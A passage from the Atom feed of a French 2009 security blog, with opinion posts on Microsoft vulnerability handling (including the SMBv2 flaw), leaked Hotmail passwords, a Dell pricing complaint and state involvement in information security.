TIFF&lt;/a&gt; en ... décembre 2007 ! &lt;p&gt;Que conclure de tout cela ?&lt;/p&gt;&lt;p&gt;Je ne vais pas employer un mot commençant par "E..." pour ne pas lasser mes lecteurs. Mais quand même, mettre plus d'un an à corriger des failles, corriger silencieusement des failles critiques dans le Framework .NET (exploitables à distance via SilverLight), introduire des failles dans des applications tierces comme Firefox ... ça la fout mal pour les champions du développement sécurisé ...&lt;/p&gt;&lt;br /&gt;Pour finir, félicitations aux équipes de Google et &lt;a href="http://www.paloaltonetworks.com/"&gt;Palo Alto Networks&lt;/a&gt; pour le nombre de failles qu'elles ont trouvées ! (Ce dernier étant un pare-feu innovant qui a fait du &lt;em&gt;buzz&lt;/em&gt; lors des Assises de la Sécurité).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-6745563175583976148?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/6745563175583976148/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=6745563175583976148' title='6 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6745563175583976148'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6745563175583976148'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/10/le-monstre.html' title='Le Monstre'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-2106043291957749434</id><published>2009-10-07T14:00:00.000+02:00</published><updated>2009-10-08T14:17:25.049+02:00</updated><title type='text'>Pourquoi la sécurité ne va pas s'améliorer</title><content type='html'>Il n'a échappé à personne que 10,000 mots de passe Hotmail ont été "aperçus" sur le site &lt;a href="http://pastebin.com/"&gt;pastebin.com&lt;/a&gt;. Pour ceux qui ne connaissent pas, PasteBin est un site gratuit et anonyme permettant d'échanger rapidement des données textuelles entre amis et &lt;em&gt;avec le monde entier&lt;/em&gt; par la même occasion. Ce qui est l'occasion de voir parfois à quel point &lt;a href="http://www.pastebinfail.com/"&gt;les gens sont confiants&lt;/a&gt; ...&lt;br /&gt;&lt;br /&gt;L'origine de cette divulgation est probablement liée à une campagne de &lt;em&gt;&lt;a href="http://blog.nirsoft.net/2009/08/29/msn-block-com-scam-goes-international/"&gt;phishing&lt;/a&gt;&lt;/em&gt;.&lt;br /&gt;Comme à chaque fois qu'une base importante de mots de passe est perdue, c'est l'occasion d'&lt;a href="http://localh0st.blogspot.com/2009/10/etudes-sur-les-mots-de-passe.html"&gt;enrichir ses connaissances&lt;/a&gt; sur les pratiques des utilisateurs confrontés au problème crucial du choix d'un mot de passe.&lt;br /&gt;&lt;br /&gt;Malheureusement, dans le cas de &lt;a href="http://www.acunetix.com/blog/websecuritynews/statistics-from-10000-leaked-hotmail-passwords/"&gt;Hotmail&lt;/a&gt; comme dans tous les cas antérieurs (ex. &lt;a href="http://www.darkreading.com/blog/archives/2009/02/phpbb_password.html"&gt;phpbb.com&lt;/a&gt;), le mot de passe le plus courant est ... "123456".&lt;br /&gt;&lt;br /&gt;Qu'est-ce que cela m'inspire ? Qu'après avoir lutté pendant des années pour mettre en place des politiques de robustesse sur les mots de passe dans les entreprises (c'est même une recommandation forte ou une exigence dans la plupart des normes et standards comme PCI/DSS ou ISO 2700x), le Web 2.0 nous fait revenir 20 ans en arrière.&lt;br /&gt;&lt;br /&gt;La différence, c'est que le Web 2.0 a des &lt;em&gt;clients&lt;/em&gt; là où les entreprises ont des &lt;em&gt;utilisateurs&lt;/em&gt;. Et même si les utilisateurs sont (parfois) pénibles, on peut les contraindre à obéir. Alors que le client est roi ...&lt;br /&gt;&lt;br /&gt;La situation est même pire que cela, puisque les clients du Web 2.0 sont les &lt;em&gt;annonceurs&lt;/em&gt;. L'&lt;em&gt;utilisateur&lt;/em&gt;, lui, ne paie rien et ne s'engage à rien (les contrats transnationaux signés par un simple clic sur "oui, j'accepte" n'ayant probablement aucune valeur légale). Il est donc essentiel de choyer l'utilisateur pour qu'il n'aille pas voir ailleurs. Et dans ce domaine, imposer des mots de passe complexes est tout sauf &lt;em&gt;user-friendly.&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;Dans le Web 2.0, c'est le marketing qui arbitre sur les exigences de sécurité. Les informaticiens ayant une activité professionnelle à forte composante technique, qui se sont retrouvés rattachés du jour au lendemain à une direction marketing (j'en connais beaucoup), apprécieront l'impact potentiel ...&lt;br /&gt;&lt;br /&gt;Quelques-uns, comme &lt;a href="http://www.myspace.com/"&gt;MySpace&lt;/a&gt;, imposent une &lt;em&gt;relative&lt;/em&gt; complexité sur le mot de passe (lettres ET chiffres). Résultat: le mot de passe le plus commun sur ce site est ... "&lt;a href="http://www.the-interweb.com/serendipity/index.php?/archives/94-A-brief-analysis-of-40,000-leaked-MySpace-passwords.html"&gt;password1&lt;/a&gt;" (on notera au passage que les "gens normaux" commencent à compter à partir de 1, et non 0 comme tout informaticien qui se respecte :).&lt;br /&gt;&lt;br /&gt;Est-ce que cela impacte les entreprises d'une manière ou d'une autre ? Je ne vais pas me lancer dans des débats sur l'informatique nébuleuse (&lt;em&gt;Cloud Computing&lt;/em&gt;) ou la dépendance cachée à &lt;a href="http://valleywag.gawker.com/5350555/dispatches-from-the-gfail-apocalypse"&gt;GMail&lt;/a&gt; ...&lt;br /&gt;&lt;br /&gt;Mais quand on voit le nombre de sites institutionnels qui utilisent &lt;a href="http://www.google.com/analytics/"&gt;Google Analytics&lt;/a&gt;, sans que la politique sécurité de l'entreprise ne soit applicable au mot de passe choisi ... le fait que la majorité des gens &lt;a href="http://www.numerama.com/magazine/13823-Un-seul-mot-de-passe-pour-plus-de-la-moitie-des-Francais.html"&gt;réutilisent le même mot de passe partout&lt;/a&gt; ... et la dépendance chainée entre les différents services 2.0 par le biais de la réinitialisation de mot de passe (comme dans le cas emblématique de &lt;a href="http://www.korben.info/hack-de-twitter-la-suite.html"&gt;Twitter&lt;/a&gt;) ... je suis quand même vaguement inquiet, et pas du tout confiant dans le fait que les choses vont s'améliorer !&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-2106043291957749434?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/2106043291957749434/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=2106043291957749434' title='17 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/2106043291957749434'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/2106043291957749434'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/10/pourquoi-la-securite-ne-va-pas.html' title='Pourquoi la sécurité ne va pas s&apos;améliorer'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>17</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-2316046060536335733</id><published>2009-09-19T09:00:00.000+02:00</published><updated>2009-09-19T10:43:22.461+02:00</updated><title type='text'>L'échec de Microsoft</title><content type='html'>Dans Windows, il n'y a que 3 points d'entrée à défendre:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;La pile TCP/IP&lt;/li&gt;&lt;li&gt;L'implémentation SMB (sur les ports TCP/139 et/ou TCP/445)&lt;/li&gt;&lt;li&gt;L'implémentation du RPC &lt;em&gt;endpoint mapper&lt;/em&gt; (port TCP/135)&lt;/li&gt;&lt;/ul&gt;En effet, ces 3 points d'entrée sont toujours accessibles quels que soient la version et le mode d'utilisation de Windows (machine personnelle, poste de travail, serveur, etc.).&lt;br /&gt;&lt;br /&gt;Il est possible de n'avoir aucun port ouvert sur l'extérieur (moyennenant &lt;a href="http://www.hsc.fr/ressources/breves/min_srv_res_win.html"&gt;quelques astuces&lt;/a&gt; telles que la configuration de la clé de base de registre "ListenOnInternet"), mais en pratique je n'ai jamais vu une machine configurée de la sorte ailleurs que dans les labos de recherche.&lt;br /&gt;&lt;br /&gt;Avec Windows Vista (sorti en &lt;a href="http://fr.wikipedia.org/wiki/Windows_Vista"&gt;novembre 2006&lt;/a&gt;, pour mémoire), Microsoft a modifié deux composants fondamentaux:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;La pile TCP/IP, entièrement réécrite pour supporter nativement IPv6.&lt;/li&gt;&lt;li&gt;L'implémentation SMB, passée en version 2. Cette version est supposée &lt;a href="http://download.microsoft.com/documents/uk/technet/postevent/28-11-2006/windows-vista-security-titbits.ppt"&gt;plus simple&lt;/a&gt; (donc plus sûre) avec seulement 16 commandes au lieu de 80.&lt;/li&gt;&lt;/ul&gt;Bien sûr, avec tout le tremblement autour du &lt;a href="http://blogs.msdn.com/sdl/"&gt;&lt;em&gt;Secure Development Lifecycle&lt;/em&gt;&lt;/a&gt;, on aurait pu penser que le remplacement de 2 composants critiques sur 3 se ferait avec toutes les précautions possibles.&lt;br /&gt;&lt;br /&gt;Ca sentait pourtant mauvais, puisque la pile IP s'est d'abord avérée &lt;a href="http://www.symantec.com/avcenter/reference/ATR-VistaAttackSurface.pdf"&gt;partiellement vulnérable à la Land Attack&lt;/a&gt; (avant la sortie de la RTM), puis une faille conceptuelle dans l'implémentation de la signature SMB a obligé Microsoft à mettre à jour le protocole en version 2.1 (&lt;a href="http://www.microsoft.com/technet/security/bulletin/MS07-063.mspx"&gt;bulletin de sécurité MS07-063&lt;/a&gt;).&lt;br /&gt;&lt;br /&gt;&lt;div&gt;Mais ce mois-ci, c'est le drame.&lt;/div&gt;&lt;div&gt; &lt;/div&gt;&lt;div&gt;Non seulement la pile IP s'avère vulnérable à une faille d'exécution de code à distance (pas triviale, je l'avoue) - &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1925"&gt;CVE-2009-1925&lt;/a&gt;, à ne pas confondre avec la faille &lt;a href="http://sockstress.com/"&gt;SockStress&lt;/a&gt; qui a été patchée dans le même bulletin (&lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS09-048.mspx"&gt;MS09-048&lt;/a&gt;) - mais surtout il n'a échappé à personne qu'une faille d'exécution de code à distance (&lt;a href="http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx"&gt;confirmée par Microsoft&lt;/a&gt;) non patchée affecte la pile SMBv2.&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Quelles leçons tirer de tout cela ?&lt;/div&gt;&lt;ol&gt;&lt;li&gt;On ne peut avoir confiance en personne. Malgré un budget de 4 milliards de dollars pour le développement de Vista, le recrutement de toutes les pointures en sécurité disponibles sur le marché, et des objectifs affichés en matière de sécurité, Microsoft a raté[*] une faille assez triviale (à détecter, pas à exploiter :) et catastrophique en terme d'impact.&lt;/li&gt;&lt;li&gt;Il n'y a eu aucune analyse correcte de la faille sur Internet. Je n'ai vu que &lt;a href="http://vrt-sourcefire.blogspot.com/2009/09/smbv2-quotes-dos-quotes.html"&gt;SourceFire&lt;/a&gt; et &lt;a href="http://reversemode.com/index.php?option=com_content&amp;amp;task=view&amp;amp;id=64&amp;amp;Itemid=1"&gt;ReverseMode&lt;/a&gt; aborder le sujet sous un angle vaguement technique, sans toutefois rentrer dans les détails. Ca ne veut pas dire que personne ne comprend rien - ça veut dire que les gens qui travaillent sérieusement sur cette faille ne sont pas payés pour faire fuir les détails &lt;a href="http://expertmiami.blogspot.com/"&gt;sur leur blog&lt;/a&gt; ...&lt;/li&gt;&lt;li&gt;Par contre des gens pour &lt;a href="http://www.procyonlabs.com/software/smb2_bsoder"&gt;réécrire le code d'exploitation en Java&lt;/a&gt; et s'accorder tous les crédits, il y en a eu. J'attends la version PHPCLI ...&lt;/li&gt;&lt;li&gt;Les loups sont lâchés. Je prédis d'autres failles sur SMBv2 (bon là je triche un peu ;).&lt;/li&gt;&lt;li&gt;Et vive la France, puisque tous les acteurs de la chaine sont francophones ! &lt;a href="http://g-laurent.blogspot.com/"&gt;Laurent Gaffié&lt;/a&gt; (on m'a dit qu'il était québecois, mais je ne le connais pas personnellement), Kostya Kortchinsky et Nicolas Pouvesle.&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;[*] Est-ce que Microsoft a vraiment "raté" cette faille ? Pas tout à fait sûr, puisque la faille a été corrigée dans Windows Seven entre la RC et la RTM. Reste à savoir si cette correction a été apportée sans comprendre l'impact de la faille ("à la Linux"), ou si Microsoft a tout à fait compris l'enjeu ... et décidé de passer la faille sous le tapis, ce qui serait vraiment malhonnête de la part d'une société qui prétend donner des &lt;a href="http://msdn.microsoft.com/en-us/security/dd219581.aspx"&gt;leçons de sécurité&lt;/a&gt; à tout le monde !&lt;/div&gt;&lt;div&gt; &lt;/div&gt;&lt;div&gt;PS. Bienvenue aux lecteurs de la &lt;a href="http://www.xmcopartners.com/actualite-securite-vulnerabilite-fr.html"&gt;&lt;em&gt;newsletter&lt;/em&gt; XMCO&lt;/a&gt; n°23 :)&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-2316046060536335733?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/2316046060536335733/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=2316046060536335733' title='8 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/2316046060536335733'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/2316046060536335733'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/09/lechec-de-microsoft.html' title='L&apos;échec de Microsoft'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-3017727775878158701</id><published>2009-09-15T10:00:00.003+02:00</published><updated>2009-09-16T10:30:46.426+02:00</updated><title type='text'>Je suis fâché contre Dell</title><content type='html'>Ces derniers temps, mes collègues et moi avons eu plusieurs expériences malheureuses avec Dell: délais de livraison allongés de manière incompréhensible, supports technique et commercial totalement inutiles, disponibilité des pilotes Vista plusieurs mois après la sortie du matériel (alors que la machine est livrée par défaut sous Vista), conception matérielle douteuse (ex. connecteurs trop fragiles), etc.&lt;br /&gt;&lt;br /&gt;Mais sur le &lt;a href="http://accessories.euro.dell.com/sna/"&gt;site de Dell&lt;/a&gt;, franchement, on est à la limite de l'escroquerie:&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/dIotYyyrJ2Y&amp;amp;hl=en&amp;amp;fs=1"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;br /&gt;&lt;br /&gt;&lt;embed src="http://www.youtube.com/v/dIotYyyrJ2Y&amp;amp;hl=en&amp;amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" height="344" width="425"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Ecrire le tarif de la hotline en noir sur fond noir, ça ne doit pas être très légal, surtout à 0,15€/mn.&lt;br /&gt;&lt;br /&gt;Edit: pour les gens qui ne veulent pas installer Flash (excellente idée au demeurant) ou qui ne peuvent pas installer Flash, voici les screenshots.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://newsoft.dyndns.org/blog/dell01.png"&gt;&lt;img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 461px; DISPLAY: block; HEIGHT: 237px; CURSOR: hand" border="0" alt="" src="http://newsoft.dyndns.org/blog/dell01.png" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://newsoft.dyndns.org/blog/dell02.png"&gt;&lt;img style="TEXT-ALIGN: center; MARGIN: 0px auto 10px; WIDTH: 462px; DISPLAY: block; HEIGHT: 237px; CURSOR: hand" border="0" alt="" src="http://newsoft.dyndns.org/blog/dell02.png" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-3017727775878158701?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/3017727775878158701/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=3017727775878158701' title='10 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3017727775878158701'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3017727775878158701'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/09/je-suis-fache-contre-dell.html' title='Je suis fâché contre Dell'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-3464642441257909816</id><published>2009-09-04T08:00:00.000+02:00</published><updated>2009-09-04T08:00:01.471+02:00</updated><title type='text'>Message aux lecteurs de DC</title><content type='html'>&lt;div&gt;Désolé pour ceux qui ne connaissent pas "DC", cela ne devrait toutefois pas les arrêter de lire la suite (j'essaie d'éviter les &lt;i&gt;private jokes&lt;/i&gt; autant que possible).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;"DC" est de la &lt;a href="http://fr.wikipedia.org/wiki/G%C3%A9n%C3%A9ration_X"&gt;génération W&lt;/a&gt;: il blogue par email. Il a toutefois la courtoisie de ne pas mettre tous ses destinataires en copie ouverte, contrairement à &lt;a href="http://twitter.com/dragosr"&gt;d'autres&lt;/a&gt; (ce qui me vaut au passage l'insigne honneur d'avoir mon email publié dans &lt;a href="http://sid.rstack.org/blog/index.php/358-zf05-thoughts"&gt;ZF05&lt;/a&gt;).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;A la lecture de sa dernière lettre, il m'a semblé opportun de dissiper ici les malentendus qu'ont pu engendrer un &lt;a href="http://news0ft.blogspot.com/2009/07/lechec-de-la-securite-francaise.html"&gt;billet antérieur&lt;/a&gt;, interprêté comme une tentative de &lt;a href="http://fr.wikipedia.org/wiki/Troll_(Internet_et_Usenet)"&gt;troll&lt;/a&gt;, voire une résurrection de l'analogie éculée entre industrie informatique et industrie automobile (cf. commentaires du susdit billet).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pourtant mon propos initial était brûlant d'actualité (c'est d'ailleurs le propre d'un blog): il s'agit de l'irruption des Etats dans le domaine de la Sécurité des Systèmes d'Information (&lt;a href="http://www.zdnet.fr/actualites/internet/0,39020774,39387049,00.htm"&gt;Obama&lt;/a&gt; en étant le champion).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;En effet, jusqu'à présent, on ne peut pas dire que le pouvoir politique ait beaucoup contribué au domaine de la SSI. Aucun homme public n'a signalé (à ma connaissance) s'il était pour ou contre le &lt;i&gt;&lt;a href="http://en.wikipedia.org/wiki/Full_disclosure"&gt;full disclosure&lt;/a&gt;&lt;/i&gt;, un sujet qui a pourtant fait circuler beaucoup d'électrons ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Quant au pouvoir judiciaire, il s'intéresse essentiellement aux crimes et délits "de la vraie vie" ayant parfois un support informatique (vol, chantage, racket, pornographie, etc.). Si vous souhaitez porter plainte pour négligence contre &lt;a href="http://www.debian.org/"&gt;Debian&lt;/a&gt;, allez expliquer au juge que vous avez été compromis à cause d'une défaillance dans le &lt;a href="http://www.metasploit.com/users/hdm/tools/debian-openssl/"&gt;générateur d'entropie d'OpenSSL&lt;/a&gt; !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;L'essentiel de l'action publique visible dans le domaine de la SSI se limite à la certification &lt;a href="http://www.ssi.gouv.fr/archive/fr/confiance/certificats.html"&gt;Critères Communs&lt;/a&gt; de quelques systèmes cryptographiques, essentiellement matériels.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mais l'informatique a un problème de fond, qui s'appelle le &lt;a href="http://en.wikipedia.org/wiki/Commercial_off-the-shelf"&gt;COTS&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Car dans tous les domaines numériques, c'est désormais le marché "grand public" qui dicte les choix technologiques. Et les Etats (ce qui inclut l'administration, la police, l'armée, etc.) ne font pas mieux: ils utilisent Windows (ou &lt;a href="http://www.infos-du-net.com/actualite/12779-gendarmerie-linux-ubuntu.html"&gt;Linux&lt;/a&gt;). Ils ont confiance dans leurs antivirus. Ils utilisent du WiFi, du BlueTooth et du GSM. Ils utilisent &lt;a href="http://www.spyworld-actu.com/spip.php?article7918"&gt;BlackBerry&lt;/a&gt;. Ils utilisent Internet (voire des Livebox) comme réseau de transport pour les liaisons point à point. Ils ont des sites Web publics (qui ne sont plus éteints la nuit). Même la Chine, qui prétend utiliser&lt;a href="http://fr.wikipedia.org/wiki/Kylin"&gt; son propre système d'exploitation&lt;/a&gt;, n'a fait que &lt;i&gt;repackager&lt;/i&gt; un FreeBSD.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Bien sûr, il n'y a pas que les Etats qui sont dans cette situation. Toutes les industries, y compris les plus critiques, reposent sur des réseaux Windows (plus ou moins) connectés à Internet. Je ne suis pas spécialiste SCADA, mais je connais un peu le réseau inter-aéroportuaire &lt;a href="http://fr.wikipedia.org/wiki/Soci%C3%A9t%C3%A9_internationale_de_t%C3%A9l%C3%A9communication_a%C3%A9ronautique"&gt;SITA&lt;/a&gt;. Ainsi que le grand usage d'Excel (et de ses macros) dans les banques.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Compte-tenu du coût, de la pauvreté de l'offre de solutions (sérieuses), et de la technicité requise pour assurer un bon niveau de sécurité dans un réseau de technologies COTS, il n'y aucune raison pour que "ce soit mieux ailleurs".&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Après tous, un &lt;i&gt;botnet&lt;/i&gt; de quelques milliers de machines arrive à &lt;a href="http://it.slashdot.org/story/09/08/07/1235257/Twitter-Facebook-DDoS-Attack-Targeted-One-User"&gt;éteindre Facebook&lt;/a&gt; (on notera là encore l'effet de levier du grand public sur l'informatique professionnelle). Or c'est à la portée de n'importe quel &lt;a href="http://fr.wikipedia.org/wiki/Mafiaboy"&gt;lycéen&lt;/a&gt;. Et il n'y a aucune raison pour que &lt;a href="http://www.impots.gouv.fr/"&gt;impots.gouv.fr&lt;/a&gt; soit mieux &lt;a href="http://www.neteco.com/50880-victime-de-son-succes-impots-gouv-fr-sature.html"&gt;protégé contre les DDoS&lt;/a&gt; que Facebook.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dans ces conditions, il est évident que la SSI est devenue un enjeu majeur pour les Etats. Mais là, plutôt que de légiférer (intelligement) sur le sujet (une fonction régalienne assez pratique), il semble que la politique actuelle soit plutôt ... de commencer à jouer sur le terrain technique de la SSI !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Il est vrai que voter des lois nationales pour les appliquer à un réseau international (et de fait contrôlé par les acteurs américains du domaine: Microsoft, Cisco, Google, VeriSign, etc.) semble voué à l'échec, sauf à construire un Internet français. Malheureusement, la Chine a été trop critiquée sur le sujet pour qu'on puisse ouvertement mettre en place les mêmes solutions chez nous.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mais de là à espérer résoudre le problème par une contre-attaque technique ... cela suppose que l'Etat soit le plus fort dans le domaine, ce qui est loin d'être prouvé compte-tenu de la nature asymétrique des menaces numériques: les COTS sont tellement fragiles qu'un petit groupe organisé peut causer des dégâts considérables.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Quelques exemples d'actualité, dans lesquels l'Etat assume la responsabilité de logiciels COTS oeuvrant dans le domaine de la sécurité:&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Les "&lt;a href="http://www.ecrans.fr/Loppsi-2-l-arrivee-des-mouchards,7293.html"&gt;mouchards numériques&lt;/a&gt;" imaginés dans LOPPSI 2. Si le mouchard est logiciel, une confrontation inévitable va s'en suivre avec les éditeurs antivirus (et assimilés). Il n'est pas sûr que l'Etat arrive à développer des&lt;i&gt; backdoors &lt;/i&gt;indétectables sur le long terme par tous les outils de contrôle d'intégrité du marché.&lt;/li&gt;&lt;li&gt;La détection des téléchargements illégaux dans le cadre de la loi HADOPI. La collecte et le traitement des données ont été confiés à une &lt;a href="http://www.korben.info/extelia-hadopi.html"&gt;société privée&lt;/a&gt;. Quelles conséquences si cette base de données (voire le système en amont chez les FAI) &lt;a href="http://www.freedom-to-tinker.com/blog/felten/major-intrusion-mediadefender"&gt;est compromise&lt;/a&gt; ?&lt;/li&gt;&lt;li&gt;La &lt;a href="http://www.ssi.gouv.fr/archive/fr/confiance/certif-cspn.html"&gt;CSPN&lt;/a&gt;. Ce qui au départ devait être une certification administrative de type Critères Communs (tous ceux qui se présentent finissent par l'avoir ... tôt ou tard !) se transforme ni plus ni moins en une collecte de failles d'implémentation dans des produits COTS (un &lt;a href="http://www.zerodayinitiative.com/"&gt;ZDI-like&lt;/a&gt; français ? Mais que va faire &lt;a href="http://www.vupen.com/"&gt;VUPEN&lt;/a&gt; !). Je ne peux pas croire que seuls 3 produits se soient présentés depuis la création de cette certification: l'Etat doit donc disposer d'un sacré stock de "0day" :) Car par expérience: "tout produit qui n'est pas un produit de sécurité, et qui n'a pas été conçu par des gens de la sécurité, est truffé de failles de sécurité" ...&lt;/li&gt;&lt;li&gt;L'ANR &lt;a href="http://secsi.adullact.net/"&gt;SEC&amp;amp;SI&lt;/a&gt;. Ou comment essayer de régler le problème des &lt;i&gt;malwares &lt;/i&gt;sur Internet en proposant à Mme Michu un système ultra-sécurisé, permettant de lire son mail, d'ouvrir des documents (Open)Office et de surfer sur Internet en toute confiance. C'est une lourde responsabilité pour l'éditeur d'une telle solution, comme en ont fait les frais les Chinois avec leur logiciel de filtrage &lt;a href="http://fr.wikipedia.org/wiki/Green_Dam_Youth_Escort"&gt;Green Dam&lt;/a&gt;. La mission n'est pas totalement impossible, si on oublie tout critère d'ergonomie et de convivialité (laissez tomber Flash) ... mais Windows Seven n'est-il pas déjà assez sécurisé pour ce qu'on &lt;a href="http://video.google.fr/videoplay?docid=5430343841227974645"&gt;fait sur Internet&lt;/a&gt; ? ;)&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;Tous ces projets ont en commun d'impliquer l'Etat à très bas niveau (technique) dans le domaine des technologies "grand public". Imagine-t-on un jour un produit antivirus certifié CSPN et recommandé sur le site de l'&lt;a href="http://www.ssi.gouv.fr/"&gt;ANSSI&lt;/a&gt; ? Même si l'objet de la CSPN est différent, on sait ce qui est arrivé à tous les gens qui ont annoncé être &lt;i&gt;&lt;a href="http://sid.rstack.org/blog/index.php/348-challenge-fail"&gt;unbreakable&lt;/a&gt;&lt;/i&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Je ne parlerai pas des projets de cyber-guerre, qui impliquent de doter les services de l'Etat de capacités &lt;a href="http://archives.odebi.org/-cat=84.htm"&gt;offensives&lt;/a&gt;. Un gradé américain avait &lt;a href="http://www.afji.com/2008/05/3375884/"&gt;quand même proposé&lt;/a&gt; que tout bon patriote installe le &lt;i&gt;bot&lt;/i&gt; officiel du gouvernement américain sur son poste, pour donner à son pays la capacité de lancer des DDoS ! La sécurité des COTS est dans un état tellement lamentable que l'attaque est plusieurs ordres de magnitude plus facile que la défense, la cyber-guerre devrait donc réussir.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Le vrai problème, et ce sera ma conclusion pour aujourd'hui, ne sont pas les mérites respectifs de l'industrie automobile et de l'industrie informatique. Le vrai problème, c'est que l'Etat semble désormais décidé à vouloir faire régner l'ordre numérique, et choisit pour cela d'oeuvrer dans les domaines techniques de la SSI. Mais s'il est possible de rentrer dans la police &lt;a href="http://www2.blog-police-recrutement.com/"&gt;sans aucun diplôme&lt;/a&gt;, il n'est pas 1% des élèves issus des écoles d'informatique qui n'aient le &lt;i&gt;&lt;a 